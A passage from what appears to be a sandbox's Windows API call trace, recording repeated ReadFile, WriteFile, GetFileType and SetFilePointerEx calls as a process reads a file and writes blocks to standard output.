(hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.159] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.159] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] GetFileType (hFile=0x4c) returned 0x1 [0174.159] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.159] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.160] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.160] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] GetFileType (hFile=0x4c) returned 0x1 [0174.160] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.160] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.161] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.161] GetFileType (hFile=0x4c) returned 0x1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.161] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.162] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.163] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.164] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.165] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.166] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.167] ReadFile (in: hFile=0x54, 